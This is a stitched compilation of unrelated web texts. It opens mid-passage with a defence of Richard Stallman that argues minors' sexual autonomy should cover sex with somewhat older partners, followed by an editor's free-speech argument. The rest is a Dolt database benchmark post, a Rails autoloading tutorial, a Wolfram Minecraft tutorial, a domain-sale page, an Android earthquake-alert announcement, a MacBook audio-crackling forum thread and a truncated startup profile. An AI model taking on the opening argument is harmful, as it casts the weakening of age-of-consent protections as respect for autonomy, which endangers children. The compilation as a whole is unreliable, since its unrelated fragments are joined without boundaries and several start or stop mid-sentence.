of sexuality where liberals and progressives and feminists have been saying, Yes! If you’re old enough to have sex. You should have the right to contraception and access to it. You should have the right to have an abortion. You shouldn’t have to consult with your parents and have their permission or a judge’s permission because you’re sufficiently mature! And the Supreme Court sided in accord of that position. The U.S. Supreme Court said constitutional rights do not magically mature and spring into being only when someone happens to attain the state defined age of majority. In other words the constitution doesn’t prevent anyone from exercising rights, including Rights and sexual freedoms, freedom of choice and autonomy at a certain age! And so you can’t have it both ways. 
You can’t say well we’re strongly in favor of minors having the right to decide what to do with their own bodies, to have an abortion—what is in some people’s minds murder—but we’re not going to trust them to decide to have sex with somewhat older than they are. And I say somewhat older than they are because that’s something where the law has also been subject to change. On all issues of when you obtain the age of majority, states differ on that widely and they choose different ages for different activities. When you’re old enough to drive, to have sex with someone around your age, to have sex with someone much older than you. There is no magic objective answer to these questions. I think people need to take seriously the importance of sexual freedom and autonomy and that certainly includes women, feminists. They have to take seriously the question of respecting a young person’s autonomy in that area. There have been famous cases of 18 year olds who have gone to prison because they had consensual sex with their girlfriends who were a couple of years younger. A lot of people would not consider that pedophilia and yet under some strict laws and some absolute definitions it is. Romeo and Juliet laws make an exception to pedophilia laws when there is only a relatively small age difference. But what is relatively small? So to me, especially when he says he is re-examining his position, Stallman is just thinking through the very serious debate of how to be protective and respectful of young people. He is not being disrespectful, much less wishing harm upon young people, which seems to be what his detractors think he’s doing. by Hannah Wolfman-Jones - May 11, 2020 I have chosen to keep Stallman as a writer for . I believe Stallman to be quite possibly the best person in the world for defining and explaining free software. I do not believe any of his infractions—which led to a firestorm of controversy and resignation from MIT and his own foundation—to be so grave as to warrant his removal from the book and project. The paradox of Stallman is that while his pointedness and stubbornness leads many to dismiss him as a jerk, his stubbornness and confrontations are actually rooted in his life-long obsession with morality. Though you may disagree, there is ample reason to believe he has come to hold his views from a concerted, rigorous, good-faith effort to be a voice for good in the world. Ironically, given the smears against him, one of Stallman's core tenets seems to be consent! He has dedicated decades to arguing for free software, which protects computer users from nonconsensual activities being done on their machines (amongst other things). There is plenty of evidence that Stallman consistently applies his values of consent and freedom to romance and other relations. I find the claims that he is an “abuser” and “predator” online particularly misguided. This is my best attempt to do the right thing. To stand on principle, come what may. According to the Atlantic, a full 80 percent of Americans believe that political correctness is a problem in our country. While today some smear the free speech movement as a “racist dog-whistle” or a “far-right talking point,” it turns out the numbers don’t fit that narrative. Turns out just about everyone thinks we need more free speech. This includes large pluralities of all races (e.g. 75% of African Americans, 87% of Hispanics) and all ages (e.g. 79% of Americans under age 24). A 2017 poll of 2,300 U.S. 
adults, found that 71% Americans believe that political correctness has silenced important discussions our society needs to have and 58% of Americans believe the political climate prevents them from sharing their own political beliefs. And who can blame them? Stallman had to resign from the foundation he started in order to save it from a similar smear campaign. All over an email voicing a perspective shared by a world-renowned civil-rights lawyer and feminist. Voicing such a perspective was even decried as “abuse!” because it was so politically incorrect, but what happens if society gets “politically correct” wrong? And if we don’t allow the “politically incorrect” amongst us to speak, how will we ever know what stances considered “politically correct” are morally wrong? So you be the judge, Dear Reader. Do We The Web deserve to be #cancelled too? * Hannah Wolfman-Jones [1] is an environmental engineer who became interested in blockchain as a means to build a blockchain-based liquid democracy. She is the founder of the website [2] , as well as the editor of [3] , a book she coauthored with Nadine Strossen, Richard Stallman, Brittany Kaiser, Pia Mancini, and Santiago Siri. ↑ ** Nadine Strossen [4] is an American civil liberties advocate and feminist. She served as president of the ACLU from 1991 to 2008 [5] . She is a John Marshall Harlan II Professor of Law, Emerita [6] . Strossen has been called a “civil liberties luminary” for her life long commitment to the rights of women, children, the oppressed, and freedom of speech. She has written extensively on these subjects and constitutional law. ↑ Back to Voices of Support References and Notes
1
Database Performance: Dolt vs. MySQL
Dolt is a version controlled SQL database. Dolt's query interface is SQL, and it has Git-like version control features. Adding version control features to a SQL database has performance trade-offs when comparing Dolt with traditional databases like MySQL. In particular, relational databases use highly optimized storage layouts that are motivated by query engine performance. Implementing version control features requires making compromises about the storage layout that impact query performance. We believe that the explosion of data-centric business processes and applications justifies a database that makes this tradeoff. The purpose of this post is to show how we measure those performance tradeoffs and set clear expectations on Dolt performance. Our goal is to get Dolt to the point where it is no more than 2-4 times slower than MySQL. We spend the balance of this post showing how we measure ourselves against that goal.

Database solutions, for example MySQL and Postgres, are designed to be application backing stores. More precisely, they are optimized for online transaction processing (OLTP) use cases, defined loosely as: processing in which the system responds immediately to user requests. Dolt's version control features were designed with a different set of use cases in mind, most of which are not OLTP. For example, we are currently onboarding a customer using Dolt as a backend for researcher output. They use Dolt's branching functionality to compare results submissions before combining those submissions into a master copy. We have other users who are using Dolt as an ETL ingestion point, ensuring that all third-party data is robustly versioned. Dolt's commit graph acts as a "configurable boundary" for their organization, providing users with simple tools for controlling what data comes through that boundary.

Despite early adoption from non-OLTP use cases, users still want fast query performance. Faster is obviously better. We think that as Dolt gets faster, Dolt could make sense for some OLTP use cases that are willing to trade performance for version control features. We are really interested in supporting as many use cases as we can long term. Thus, we are committed to making Dolt as fast as possible. As stated at the outset, our goal is to get Dolt to the point where it is no more than 2-4 times slower than MySQL for sysbench's standard test suite of OLTP and non-OLTP tests. Additionally, we will implement custom tests that emphasize common use cases for Dolt, which we expect to be no more than 2 times slower than MySQL. Finally, we consider anything that is 10 times slower than MySQL a bug that we will prioritize fixing.

We recently blogged about our approach to benchmarking Dolt, though our documentation is the place to go for the latest information. To recap, we use sysbench, an industry standard tool for benchmarking databases, to evaluate both Dolt and MySQL using the same set of tests. For example, our most recent release is 0.22.6, and we wanted to compare this to 0.22.2, the prior release. We ran the following command, noting that $DOLT_CHECKOUT is a checkout of Dolt's GitHub repository:

$ cd $DOLT_CHECKOUT/benchmark/perf_tools
$ ./run_benchmarks.sh all 100000 oscarbatori 0.22.2 0.22.6

At a high level, the script does this for each tag and for MySQL: All the results, for MySQL and each Dolt tag, are associated with a single run ID which denotes an invocation of run_benchmarks.sh.
This means that we can identify rows that were run on the same hardware at the same time, giving us a degree of hardware context isolation. For example, this run was associated with the unique run ID 7dffeeb22fb11efaec478ef3, which identifies the results: $ ls -ltr output -rw-r--r-- 1 oscarbatori staff 6846 Dec 4 11:13 7dffeeb22fb11efaec478ef3.csv The all parameter denotes the following list of tests, though passing a comma separated list of tests also works for more targeted benchmarking: bulk_insert oltp_delete oltp_insert oltp_point_select oltp_read_only oltp_read_write oltp_update_index oltp_update_non_index oltp_write_only select_random_points select_random_ranges This is the complete list of standard sysbench tests. You can find these results posted to DoltHub, where you can run SQL against them. Here we present the results as they appear in the Dolt documentation: This analysis highlighted the select_random_ranges result as particularly bad, and it will in fact be fixed in the next release. In the previous section we pointed at these results hosted on DoltHub. We can easily clone and analyze the results in SQL as follows to compare how performance has changed between the two most recent versions: $ dolt clone dolthub/dolt-benchmarks && dolt-benchmarks cloning https://doltremoteapi.dolthub.com/dolthub/dolt-benchmarks 185 of 185 chunks complete. 0 chunks being downloaded currently. $ dolt sql ~/Documents/dolt-dbs/dolt-benchmarks/test/dolt-benchmarks|>> dolt sql # Welcome to the DoltSQL shell. # Statements must be terminated with ';'. # "exit" or "quit" (or Ctrl-D) to exit. dolt_benchmarks> SELECT -> dolt_0222.run_id as run_id, -> dolt_0222.test_name as test_name, -> dolt_0222.sql_transactions as dolt_0222, -> dolt_0226.sql_transactions as dolt_0226, -> mysql.sql_transactions as mysql, -> ROUND((1.0 * mysql.sql_transactions) / dolt_0222.sql_transactions, 1) as dolt_0222_multiple, -> ROUND((1.0 * mysql.sql_transactions) / dolt_0226.sql_transactions, 1) as dolt_0226_multiple -> FROM -> sysbench_benchmark as dolt_0222 -> inner join sysbench_benchmark as dolt_0226 -> on dolt_0222.run_id = dolt_0226.run_id -> and dolt_0222.test_name = dolt_0226.test_name -> inner join sysbench_benchmark as mysql -> on dolt_0222.run_id = mysql.run_id -> and dolt_0222.test_name = mysql.test_name -> -> WHERE -> dolt_0222.run_id = '7dffeeb22fb11efaec478ef3' -> and dolt_0222.database = 'dolt' -> and dolt_0222.committish = '0.22.2' -> and dolt_0226.database = 'dolt' -> and dolt_0226.committish = '0.22.6' -> and mysql.database = 'mysql' -> ORDER BY -> dolt_0222; +-----------------------+-----------+-----------+---------+--------------------+--------------------+ | test_name | dolt_0222 | dolt_0226 | mysql | dolt_0222_multiple | dolt_0226_multiple | +-----------------------+-----------+-----------+---------+--------------------+--------------------+ | oltp_insert | 1302 | 1167 | 6099 | 4.7 | 5.2 | | oltp_point_select | 6401 | 4819 | 32925 | 5.1 | 6.8 | | oltp_read_only | 268 | 228 | 1894 | 7.1 | 8.3 | | bulk_insert | 308783 | 308783 | 2278717 | 7.4 | 7.4 | | oltp_update_non_index | 803 | 767 | 5971 | 7.4 | 7.8 | | select_random_points | 457 | 400 | 4101 | 9 | 10.3 | | oltp_update_index | 496 | 461 | 6199 | 12.5 | 13.4 | | oltp_read_write | 90 | 88 | 1328 | 14.8 | 15.1 | | oltp_write_only | 141 | 122 | 3335 | 23.7 | 27.3 | | oltp_delete | 883 | 789 | 21847 | 24.7 | 27.7 | | select_random_ranges | 97 | 93 | 6109 | 63 | 65.7 | 
+-----------------------+-----------+-----------+---------+--------------------+--------------------+

Our conclusion from this is that while Dolt performance has improved, there is still a long way to go. As we move further along with our implementation, it will become progressively harder to find large performance improvements. This post laid out our performance commitments to our users and customers, present and future, and demonstrated our mechanism for repeatably measuring ourselves against that commitment with every release of Dolt.
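Because the results live in a SQL database, commitments like the 10x bug bar can also be checked mechanically. As a rough sketch (written by analogy with the query above, reusing the same sysbench_benchmark table and columns, not a query from our tooling), something like this would surface any test where the 0.22.6 release crosses that threshold:

SELECT
    dolt.test_name,
    ROUND((1.0 * mysql.sql_transactions) / dolt.sql_transactions, 1) as multiple_vs_mysql
FROM
    sysbench_benchmark as dolt
    inner join sysbench_benchmark as mysql
        on dolt.run_id = mysql.run_id
        and dolt.test_name = mysql.test_name
WHERE
    dolt.run_id = '7dffeeb22fb11efaec478ef3'
    and dolt.database = 'dolt'
    and dolt.committish = '0.22.6'
    and mysql.database = 'mysql'
    and (1.0 * mysql.sql_transactions) / dolt.sql_transactions > 10
ORDER BY
    multiple_vs_mysql DESC;

Against the run shown above, this would flag every test from select_random_points downward, matching the right-hand column of the table.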
2
Demystifying Rails Autoloading
When I first started learning Rails back in the day, it was my first introduction to Ruby: I was learning them both at the same time. As a result, the line between them was rather blurry; I didn’t know what was coming from Ruby, and what was coming from Rails. The Rails approach of monkey-patching Ruby didn’t help. If I’m being honest, I didn’t realize that Object#blank? wasn’t a Ruby method until only a few years ago. I think it’s really important to understand the software you’re using, particularly big frameworks like Rails that follow convention over configuration and thus end up magically doing things for you. What are you supposed to do when the magic is gone? Today I want to talk about one such piece of magic: why you need to require things in Ruby, and why you (generally) don’t in Rails.

First of all, you’ll note that the title refers to Rails autoloading. I did that for the SEO, but that’s not the only piece in play here. In fact, there are three: Let’s take each in turn. Note that for all my examples, I’m using version 3.0.1 of Ruby via RVM, with a gemset made particularly for this purpose.

Ruby does no hand-holding, and has no magic. In general, you must require everything. Let’s investigate this with a simple example. Create a new directory for this example with two files in it, one of them executable: Make ~/ruby-example/foo.rb look like this:

class Foo
  def hello
    puts 'hello, world!'
  end
end

This file defines a simple class with a single method that prints a message. Now let’s fill out ~/ruby-example/main.rb to use it:

#!/usr/bin/env ruby

foo = Foo.new
foo.hello

This simply instantiates our class and runs the method that should print our message. Let’s run it: This doesn’t work because Ruby has no magic here: it has no idea what Foo is, despite the fact that the file defining it is sitting right next to the one you’re executing. You need to require it. Make ~/ruby-example/main.rb look like this:

#!/usr/bin/env ruby

require_relative 'foo'

foo = Foo.new
foo.hello

Run it again, and behold success: In general you need to be pretty explicit in Ruby about your dependencies. In trade, it’s usually pretty easy to determine where your dependencies are coming from, since there’s an explicit require chain that pulls it in. One could make the case that needing to explicitly include everything you’re using is tedious. This is actually one of the roles that Bundler can play.

Most folks know that Bundler can be used to manage your dependencies, but did you know that it can also be used to require those dependencies? Create a new directory for this example with two files in it, one of them executable: The ~/bundler-example/Gemfile is used by bundler to control your dependencies. Make it look like this: The hello-world gem is useful because it just prints a message when you require it. Install it: Now make ~/bundler-example/main.rb look like this:

#!/usr/bin/env ruby

require 'bundler/setup'

Bundler.require

That’s the message printed by the hello-world gem when you require it, as I mentioned above. That means Bundler included it for you, as a result of it being part of your Gemfile. You can hand Bundler.require different groups to limit what it requires for you, as well (production versus development or test, for example). Now that you’re familiar with this technique, go to any Rails application and check out config/application.rb, and you’ll see something like this:

# ...

# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)

# ...

So Rails applications do this for you by default, which is why you generally don’t need to require any of your dependencies. There are caveats, however. Lots of Rails developers (including me) have settled on a modular approach to developing Rails applications, which means that a given application is split across a number of gems, which are often Rails engines. If you’re also in this camp, one thing to keep in mind is that gems (including engines) do not have this functionality. Gems generally execute within the context of the main application’s Gemfile, so they can’t lean on Bundler like this. Gems are expected to require their own dependencies. That doesn’t mean you need to do it in every file, though, if that annoys you. Ruby’s require has global effect, which means once something is required in one place, it can be used everywhere. If you have a file which is generally loaded as part of using the gem (e.g. lib/<gem name>.rb), you can put your requires there and just use them everywhere.

So Bundler magic covers why you don’t need to require your gem dependencies, but what about other .rb files within the same app (or engine)? If you’re familiar with Rails, you may have noticed you generally don’t need to require those either. That flies in the face of our understanding of Ruby, and it’s thanks to Rails magic called autoloading. There are other resources that describe Rails autoloading in detail. Those are recommended reading, so I won’t repeat them. The general idea is this: if you access a constant that is missing in the current execution context (e.g. a class defined in another file), Rails will try to find and require the file that defines it for you by searching a pre-defined set of autoload paths, following a convention where each namespace for the constant equals a directory. A simplistic example: if you try to access Bar and it’s not defined, Rails will quickly check to see if there’s a bar.rb file in any of the autoload paths. If there’s not, it’ll either complain or you’ll get the standard Ruby error for trying to access an undefined thing. If you try to access MyModule::Bar, it’ll search those same autoload paths for my_module/bar.rb. (A rough sketch of this mapping appears at the end of this post.) As a caveat, Rails engines don’t add their lib/ directory to the set of autoload paths by default, but you’ll notice engine developers often do it themselves for consistent behavior.

Rails has done a magnificent job of making it trivial to get up and running developing new web applications, thanks to its convention-over-configuration approach. Its use of Bundler and autoloading to handle requires is no small part of that overall philosophy, and I suspect it’s a large reason for its success. That said, if you never really try to understand what Rails is doing for you, you will eventually get bitten when it doesn’t do what you expect. Gaining at least a small insight into how this particular piece of the puzzle works will pay dividends down the road, and I hope this was helpful in accomplishing exactly that.
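For the curious, here is the rough sketch promised above: a deliberately simplified, illustration-only version of the constant-name-to-file-path convention. This is not how Rails actually implements autoloading (the real machinery handles nesting, eager loading, reloading and much more), and the autoload paths listed are just placeholders:

# Illustration only: a naive "constant name -> file path" lookup.
# Rails' real autoloader is far more sophisticated than this.
AUTOLOAD_PATHS = ['app/models', 'app/services', 'lib'].freeze # placeholder paths

def underscore(name)
  # "MyModule::Bar" => "my_module/bar"
  name.gsub('::', '/')
      .gsub(/([a-z\d])([A-Z])/, '\1_\2')
      .downcase
end

def autoload_constant(const_name)
  relative = "#{underscore(const_name)}.rb"
  AUTOLOAD_PATHS.each do |root|
    candidate = File.join(root, relative)
    return require File.expand_path(candidate) if File.exist?(candidate)
  end
  raise NameError, "uninitialized constant #{const_name}"
end

autoload_constant('MyModule::Bar') # would require app/models/my_module/bar.rb, if present

In real Rails you never call anything like this yourself; the lookup is triggered for you when a constant reference fails to resolve.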
1
Programming Minecraft on the Raspberry Pi with Wolfram (2018)
The standard Raspbian software on the Raspberry Pi comes with a basic implementation of Minecraft and a full implementation of the Wolfram Language. Combining the two provides a fun playground for learning coding. If you are a gamer, you can use the richness of the Wolfram Language to programmatically generate all kinds of interesting structures in the game world, or to add new capabilities to the game. If you are a coder, then you can consider Minecraft just as a fun 3D rendering engine for the output of your code.

The first step is to make sure that you have all the right components. Make sure that you have the latest version of the operating system, Minecraft and the Wolfram Language. You do this by connecting your Raspberry Pi to the network, opening the Terminal app and typing the following:

sudo apt-get update
sudo apt-get dist-upgrade
sudo apt-get install minecraft-pi

Now open Mathematica on the Pi, or another computer, and type: … followed by Shift + Return to evaluate it. If all went well, we are ready to start.

The MinecraftLink library adds a small set of new commands to the Wolfram Language for connecting to a running Raspberry Pi Minecraft game. Start by launching Minecraft on the Raspberry Pi, and then start a fresh game or open an existing one. You must have a Minecraft game open before you can connect to it from the Wolfram Language. In the Wolfram Language, load the library by evaluating the following: This extends the Wolfram Language with the following new commands: You can find documentation on these by evaluating MinecraftHelp[] after you have installed the link.

You can control a Minecraft game running on the Raspberry Pi from the Wolfram Language running on the same Raspberry Pi, or from any other computer that has a network connection to the Pi. If you’re connecting from a different computer, you must now tell the Wolfram Language the name or IP address of the Raspberry Pi where Minecraft is running… You don’t need to do this if both programs are on the same machine, but if you need to reset the connection, you can use MinecraftConnect[] or MinecraftConnect["localhost"]. If you get a “Cannot connect” message, then the problem is either that you have the wrong IP address, that there is no network connection to the Pi, or that you forgot to start a Minecraft game first.

Let’s test to see if that worked by evaluating the following code:

MinecraftChat["Hello from the Wolfram Language"]

You should see the message appear briefly in the game chat area: We need to find out where we are in the Minecraft world. Minecraft uses a simple
{x, y, z} coordinate system, where x and z are the horizontal directions (x is left/right if you have just started the game) and y is the vertical direction. If you have started a fresh game, you will be near to {0, 0, 0}. You can see the coordinates in the top-left corner of the screen, but to get them programmatically you can use: We can teleport the character to a new location (in this case, up in the air) with: If we have just started a game, then 10 blocks in front of us is {0, 10, 0}. But depending on how mountainous the terrain is, that block might be above or below ground. We can find the surface level with: We can test that by looking at the block at that position. It should be Air. And the block below it should be something solid:

Now we can start building. We can place blocks of any type—for example, "Wood": We remove them by just overwriting the block with something else, such as "Air": But if you want a full undo, you must precede your changes with: And then if you don’t like your changes, you can undo them with: The list of the 156 available Minecraft block names is in the symbol $MinecraftBlockNames:

One reason to use the Wolfram Language for this is that it handles all kinds of interesting 2D and 3D objects, and I have set up the SetBlock command to handle these fairly automatically. For example, let’s paint a letter X in the sky in gold. We can remove it again by replacing it with "Air": By default, rasterized content will be 12 blocks wide, so if you need more detail, you can increase that with an option: Anything you can create in the Wolfram Language can be made into blocks. Here is a plot of the function Sin[x]: You can also control the orientation of rasterized images with an option Orientation. If the content is a 3D geometry, then it will be rasterized in 3D:

There are lots of 3D geometry primitives, and they can be combined in many ways. Here are some cuboids, a pyramid and a sphere to make a house:

(*Main house frame*)
MinecraftSetBlock[{pos, pos + {8, 3, 8}}, "Wood"];
(*Windows*)
MinecraftSetBlock[{pos + {1, 0, 0}, pos + {7, 3, 8}}, "Glass"];
(*Make it hollow*)
MinecraftSetBlock[{pos + {1, 0, 1}, pos + {7, 3, 7}}, "Air"];
(*Add a doorway*)
MinecraftSetBlock[{pos + {4, 0, 0}, pos + {4, 1, 0}}, "Air"];
(*Add a roof*)
MinecraftSetBlock[pos + {0, 4, 0}, "WoodPlanksSpruce", Pyramid[], RasterSize -> 12];
(*Decorate with gold ball*)
MinecraftSetBlock[pos + {3, 8, 2}, "GoldBlock", Sphere[], RasterSize -> 5];

OK, I’m not much of an architect! We can look at our creation from the air by controlling the camera:

Finally, we can interact with blocks that you hit using the right mouse button while holding a sword. The left mouse button just places and smashes blocks, but the right mouse button creates events that wait for us to read and act on them. You can read these with: This shows that since the game started, I have done two of these special hits, each time on the same block at {–1, 2, 2}, on face number 1 (the top of the block). I am player 1, but there could be multiple players. I can fetch these pieces of information by position and name. For example, HitHistory[–1] is the last hit, and we extract its "Position" information and use that coordinate in MinecraftGetBlock to discover the type of block that was most recently hit: And we can clear the data with: As a simple example, let’s monitor this list every second and create an explosive “super hit.” I will define the explosion first.
It is a function that takes a position and places a large sphere of air at that position: Now I create a scheduled task to run every second, and apply that function to the hit history: And now when I strike the ground in front of my house with my sword, using the right mouse button, a huge hole appears… I can remove the monitoring task with: There are a few more commands in the MinecraftLink package that you can read about in the documentation after you have installed the link. As well as giving you a simple programming interface to Minecraft, similar to other languages, the Wolfram Language contains hundreds of high-level functions that let you develop much more exciting projects quickly; you might want to check out some of the 3D geometry, 3D image processing and built-in data sources as a starting point. I will return soon with a few projects of my own. Download this post as a Wolfram Notebook.
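To make that monitoring example concrete, here is a rough sketch of what such code could look like. The explode function only uses MinecraftSetBlock arguments demonstrated above; MinecraftHitHistory[] is a hypothetical stand-in for the package's hit-history accessor (check MinecraftHelp[] for the exact names), and the scheduling uses the Wolfram Language's general ScheduledTask mechanism rather than anything specific to MinecraftLink:

(* Explosion: carve a sphere of Air centered on the given position,
   using only MinecraftSetBlock options shown earlier in this post *)
explode[pos_] := MinecraftSetBlock[pos, "Air", Sphere[], RasterSize -> 9];

(* Check the hit history once a second and explode at each hit position;
   MinecraftHitHistory[] is a placeholder name -- a real version would also
   clear the history after each pass so old hits are not re-triggered *)
task = SessionSubmit[ScheduledTask[
    explode[#["Position"]] & /@ MinecraftHitHistory[],
    1]];

(* Stop monitoring when done *)
TaskRemove[task]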
1
Selling Singleproduct.store
The domain name singleproduct.store is for sale! Seller's notes about singleproduct.store: "Create your single product store."

Buyer Protection Program
When you buy a domain name at Dan.com, you’re automatically covered by our unique Buyer Protection Program. Read more about how we keep you safe on our Trust and Security page. Next to our secure domain ownership transfer process, we strictly monitor all transactions. If anything looks weird, we take immediate action. And if the seller doesn't deliver on their part of the deal, we refund you within 24 hours.

Fast & easy transfers
98% of all domain ownership transfers are completed within 24 hours. The seller first delivers the domain to us, then we send you your tailored transfer instructions. Need help? Our domain ownership transfer specialists will assist you at no additional cost.

Hassle free payments
Pay by bank wire and get a 1% discount, or use one of the most popular payment options available through our payment processor, Adyen. Adyen is the payment platform of choice for many leading tech companies like Uber & eBay.

Value Added Tax
The Value Added Tax (VAT) is a consumption tax applied in the European Union (EU) to all goods and services. All consumers in the EU are charged VAT on the purchase of goods and services. Businesses in the EU buying from a business in the same country are also charged VAT. Businesses in the EU buying from a business in a different EU country are not charged VAT. Consumers and businesses outside of the European Union are not charged VAT. The VAT rate provided on this page is only an example (for instance, a price of USD $1,000 excl. VAT plus 21% VAT of USD $210 gives a total price of USD $1,210); it will be calculated accordingly during the checkout process after entering your billing details.

Free Ownership transfer. Free Transaction support. Secure payments. The simple, safe way to buy domain names: no matter what kind of domain you want to buy, we make the transfer simple and safe.
18
Earthquake detection and early alerts, now on your Android phone
Earthquakes happen daily around the world, with hundreds of millions of people living in earthquake prone regions. An early warning can help people prepare for shaking, but the public infrastructure to detect and alert everyone about an earthquake is costly to build and deploy. We saw an opportunity to use Android to provide people with timely, helpful earthquake information when they search, as well as a few seconds warning to get themselves and their loved ones to safety if needed.

Sending earthquake alerts to Android devices in California

First, we collaborated with the United States Geological Survey (USGS) and California Governor's Office of Emergency Services (Cal OES) to send earthquake alerts, powered by ShakeAlert®, directly to Android devices in California. Developed by the nation’s leading seismologists, the ShakeAlert system uses signals from more than 700 seismometers installed across the state by USGS, Cal OES, University of California Berkeley, and the California Institute of Technology. A few seconds of warning can make a difference in giving you time to drop, cover, and hold on before the shaking arrives.

Building the world’s largest earthquake detection network

Installing a ground network of seismometers, as California has done, may not be feasible in all impacted areas around the world. So we’re using the reach of Android’s platform to help detect earthquakes. Starting today, your Android phone can be part of the Android Earthquake Alerts System, wherever you live in the world. This means your Android phone can be a mini seismometer, joining millions of other Android phones out there to form the world’s largest earthquake detection network. All smartphones come with tiny accelerometers that can sense signals that indicate an earthquake might be happening. If the phone detects something that it thinks may be an earthquake, it sends a signal to our earthquake detection server, along with a coarse location of where the shaking occurred. The server then combines information from many phones to figure out if an earthquake is happening. We’re essentially racing the speed of light (which is roughly the speed at which signals from a phone travel) against the speed of an earthquake. And lucky for us, the speed of light is much faster! To start, we’ll use this technology to share a fast, accurate view of the impacted area on Google Search. When you look up “earthquake” or “earthquake near me,” you’ll find relevant results for your area, along with helpful resources on what to do after an earthquake.

We’ve worked with globally-renowned seismology and disaster experts Dr. Richard Allen, Dr. Qingkai Kong and Dr. Lucy Jones to develop this crowdsourced approach for detecting earthquakes all around the world. You might be wondering, “what’s next?” We’re starting with earthquake alerts in California since there’s already a great seismometer-based system in place. Over the coming year, you can expect to see the earthquake alerts coming to more states and countries using Android’s phone-based earthquake detection.
2
MacBook Pro Cracking and Popping Sound
Hello, is it anyone here ( or on this planet ) that can help with this issue on Catalina Mac OS 10.15.5 Beta 3 (19F72f). I am using MacBook Pro 16 inches. 😟

I would like to know as well. I noticed the cracking sound when watching a concert on Youtube yesterday. I thought it was a recording problem. I then chose another concert, it was the same. Very annoying!

Catalina has a big issue with CoreAudio this time or I don't know exactly what it is. But if you are not producing music like me switch it to 48 kHz. I think it can help but is not fix the problem. Over 6 months Catalina is still stuck with this sound issue, especially people like me with brand new MCP16 inches. P.S. I have seen this problem with cracking and popping sound from EL CAPITAN. Every new MAC OS has this problem I don't know what is wrong, hardware, or OS but absolutely every time when the new OS is come out this problem is like some that are created to be like that, always. 😟 But this time it looks very long time to be fixed and there is no solution at the moment.

BTW Catalina Mac OS 10.15.5. BETA 4 still can not fix this issue ... is so important for me... I am music producer and this killed my work....

I am sorry to hear that 10.15.5 19F83c did not fix your issue. It did for me.

I *really* want to see the flow of audio in macOS, and the changes in gain/amplitude along the way. If I use the test osc plugin in Logic Pro X, running thru a specific CoreAudio driver, I can succesfully manage keeping a consistent gain structure all the way thru my mixer, using Apple supplied Class-Compliant driver. 0db sine wave is exactly that all the way thru. Easy enough. If I go over that, I hear distortion. Now... safe to say that's calibrated, but... if I use the Music app, or audio coming from Safari, signal is about 4.5db hotter. That simply *cannot* be right. Send that to internal speakers and of course they're cracking and popping.

I am with the beta version of the new os BIG SURE and this new MAC OS still CAN NOT fix this problem with the sound. I already spoke with Apple because I want back my money because this is ridiculous. Super expensive computer with this problem. I've made one Video for youtube 33 min and share all problems with 16-inch pro and Catalina and 265 people around the world contacted me with the same issue. Apple DONT CARE ABOUT THE SOUND and we never gonna see perfectly work machine with this I am 110% sure. Sad but true.

Obviously the problem isn't fixed yet by Apple... I have bought a Mac Pro (Early 2009) now running macOS 10.14.6 (18G5033) and added RAM and Graphic card to suit my needs. Then I realized that using Safari (100% of the time), or Spotify (85% of the time) the audio will crackle and pop every seconds creating a distortion. I am super disappointed that this problem is seen by hundreds of people and still isn't heard / listened too. At least I can use Chrome and the sound is perfect.. Can you explain wt* does this means? Apple?....I guess not.
Problems in the DeepCore Audio Kernel of Mojave and Catalina in my opinion... Just because you know, Apple... They want you to buy the all the time and upgrade to the latest software all the time. I hope we will see an engineer create a revolution and releasing publicly the fix XD (Maybe even a movie hahah) :/

I also have the same issue and I have updated to 10.15.5. There is a new version 10.15.6 availble today so I will install it to see if this fixes the issue

Same Problem here, i have an expensive audio interface connected and always my imac is crackling around when im playing some music from daw or even itunes! macbooks and ios is working propertly, @apple please FIX THIS: CATALINA: 10.15.6 (19G73), iMac (27-inch, Late 2012), 3,2 GHz Quad-Core Intel Core i5

Anyone heard anything? I'm seeing several having the same problem. I just got a brand new iMac, Catalina 10.15. Intermittent Audio crackles and glitches. All internal - haven't even hooked up my audio interface yet. Is this worth trying to exchange it?

Hi (all 13 inch models)
i used macbook pro 2013, no audio issue
upgraded to 2015, used it for years, no audio issues
waited for escape key to get back, and got 2020 (4 ports) running OS 10.15.6 (19G2021). had it on 10.15.4 too
so basically i upgraded (not to mention $$$) to a bug? for once, can apple get everything right? Rest in peace Steve, Rest in peace Apple?
only if I was not for the track pad and i was not an iOS developer :-(
really starting to get ****** since 2016
i know no one is going to even bother to take a look at the issue by my post here, its my attempt to get it out of my system. thats what the forums are for now a days.

I'm wondering when will apple release an update to fix this problem. The problem happened after i updated to MacOS Catalina 10.15.6 and i've installed 10.15.7 update as well and the problem is still there.

Spent thousands of dollars on a fully upgraded MacBook bro (2019) and the best audio interface you can get. Unfortunately my MAC was set on automatic updates now I literally can’t work it’s embarrassing. Not only can I not use any of my paid plugins, but I also can’t seem to record without logic or Fl studio crashing even without any plug ins! What am I supposed to tell my clients? Apple needs to fix this ASAP

Hello I am still having this issue, i am so surprised why haven't apple fixed this ? I am facing Crackling from speaker but only when i open simulator, My macbook is new i bought this 75 days ago and yet facing so many problems like this i am disappointed in Apple. I am using updated OS: MacBook Pro (16-inch, 2019) MACOS 10.15.7. I have been searching alot couldn't find any solution to this. I am developing an App that is based on Videos, such as a video editing App but i am unable to test the application because of the crackling sound whenever i play audio when simulator is opened it makes crackling noise.

It just happened to me on Catalina 10.15.7, MB Pro 16. I thought my speakers were about to **** up... it was scary to say the least.
1
Entrepreneur Raised $73M to Create Autonomous Drones
Dor Abuhasira has already raised over $70M for his tech startup, and it’s soaring in more than one way. During our interview on the DealMakers Podcast, Dor Abuhasira shared his unique path of growing up and becoming an entrepreneur out of the Startup Nation. Plus, his fundraising experiences, the challenges of being a technical founder, and his top insights for bringing in cofounders, finding a viable business model, and starting your own business. Listen to the full podcast episode and review the transcript here. *FREE DOWNLOAD* The Ultimate Guide To Pitch Decks Here is the content that we will cover in this post. Let’s get started. 1. From Engineering To Entrepreneurship 2. Perceptions, People & Profitable Products 3. Joining Elevator Fund We’ve featured a number of highly successful tech entrepreneurs out of the ‘Startup Nation’ on the Dealmakers Show over the past couple of years. Dor Abuhasira took a rather different path growing up and falling into entrepreneurship than most. Dor told our audience about his experience growing up in a Kibbutz in Israel. This is a community in which everyone gets together to work and share everything they have. A unique lifestyle in which up until around six years old all of the children would sleep and live together in a separate building with a guard. While it may sound wild to many who have grown up in the west, Dor actually recalls it as being a good experience and great childhood. While he gained some early exposure to computers, it wouldn’t be until much later, almost 28 years old, before he started putting tech and startups together. His father gave him a computer at a young age, and he not only enjoyed playing those classic old school games but programming too. Much of his schoolwork was done on computers. However, while many other tech entrepreneurs we’ve featured on the Dealmakers Show have come out of specialist technology and intelligence units in the Israeli military, Dor Abuhasira had a 